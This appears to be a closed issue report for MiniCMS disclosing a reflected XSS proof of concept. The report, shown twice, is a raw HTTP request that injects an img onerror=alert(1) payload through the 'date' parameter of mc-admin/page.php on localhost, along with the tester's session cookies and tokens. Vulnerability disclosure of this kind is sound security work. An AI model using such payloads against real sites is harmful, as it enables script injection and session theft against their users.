Closed glo0m7 closed 3 years ago
This is a reflective XSS vulnerability poc :
GET /MiniCMS-master/mc-admin/page.php?date=%22%3E%3C/a%3E%3Cimg%20src=%221%22%20onerror=alert(1)%3E%3Ca%3E HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Cookie: mc_token=d334628ee9a00a2ee62ad2c49aa66542; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1532591258; bdshare_firstime=1533113832628; iCMS_USER_AUTH=e01c476eT4bQdPtsWmzXl42txWbCIOesg%252BS%252F6gVg2cC%252FovhDVtBKX8rtXJtGbNJ9Bj7dBdE6VvqiX5EuvqCkEW66XTPjFxuseUJZi7z%252BORP2gjtoVYEXmr2Wbxa9uqJxEGmeDs1FPx1aYVD0FQm0tmQZuW9s8glK45fx%252BSPmdHLlbMcILzbqS3L8oAmMnE3s6OJUeecK%252FAtEfanGKW8dL6J0SSNE4%252FJol2h%252FS%252BXtPvEaxL%252B%252BgrR5ZNO9Bs%252F3tjBRrJfLcce95WLTlQl9b0NHU4AW0c9XGmbwMPmHeuiw9decJdP3RB2wyTUsyweMa6vXez5JH7F3i0Zm5UHj44Nt%252FxtgYLTZj20oKFQ9%252FKjXurvVFGwzISOxga%252FbtChvg86Zv4CcLksCPQh8zcp6MLyJJLBl1UWtJgraOdIZTASeqDRldBh6zihDwkfdh1mSjKlp0DQS8I086KPQnIpiy%252BWOlGPggpprumKddzGGOWCrl9ViOsTrU1xZLPaHklSpFFUypz4PxLXG4oSWvYixnUg9n0ycMC%252FDTA; iCMS_userid=d9b19480%252F1w5uy225Gj3TAlA3rip3pKZXcb9fI7JRZUq5ySw4Q; iCMS_nickname=588b0ade5DACxdo6BRGKvFFSLC7vY9tu8KTNREeXteba6BmHHfk; iCMS_article_category_tabs=list; iCMS_captcha=96448ad9d9Pvnsxi2Y87S%252BuBc%252FVRY1QgdS37nVPGY86nflTX Connection: close Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0
reason : File: WWW/MiniCMS-master/mc-admin/page.php
result :
This is a reflective XSS vulnerability poc :
GET /MiniCMS-master/mc-admin/page.php?date=%22%3E%3C/a%3E%3Cimg%20src=%221%22%20onerror=alert(1)%3E%3Ca%3E HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Cookie: mc_token=d334628ee9a00a2ee62ad2c49aa66542; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1532591258; bdshare_firstime=1533113832628; iCMS_USER_AUTH=e01c476eT4bQdPtsWmzXl42txWbCIOesg%252BS%252F6gVg2cC%252FovhDVtBKX8rtXJtGbNJ9Bj7dBdE6VvqiX5EuvqCkEW66XTPjFxuseUJZi7z%252BORP2gjtoVYEXmr2Wbxa9uqJxEGmeDs1FPx1aYVD0FQm0tmQZuW9s8glK45fx%252BSPmdHLlbMcILzbqS3L8oAmMnE3s6OJUeecK%252FAtEfanGKW8dL6J0SSNE4%252FJol2h%252FS%252BXtPvEaxL%252B%252BgrR5ZNO9Bs%252F3tjBRrJfLcce95WLTlQl9b0NHU4AW0c9XGmbwMPmHeuiw9decJdP3RB2wyTUsyweMa6vXez5JH7F3i0Zm5UHj44Nt%252FxtgYLTZj20oKFQ9%252FKjXurvVFGwzISOxga%252FbtChvg86Zv4CcLksCPQh8zcp6MLyJJLBl1UWtJgraOdIZTASeqDRldBh6zihDwkfdh1mSjKlp0DQS8I086KPQnIpiy%252BWOlGPggpprumKddzGGOWCrl9ViOsTrU1xZLPaHklSpFFUypz4PxLXG4oSWvYixnUg9n0ycMC%252FDTA; iCMS_userid=d9b19480%252F1w5uy225Gj3TAlA3rip3pKZXcb9fI7JRZUq5ySw4Q; iCMS_nickname=588b0ade5DACxdo6BRGKvFFSLC7vY9tu8KTNREeXteba6BmHHfk; iCMS_article_category_tabs=list; iCMS_captcha=96448ad9d9Pvnsxi2Y87S%252BuBc%252FVRY1QgdS37nVPGY86nflTX Connection: close Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0
reason : File: WWW/MiniCMS-master/mc-admin/page.php
result :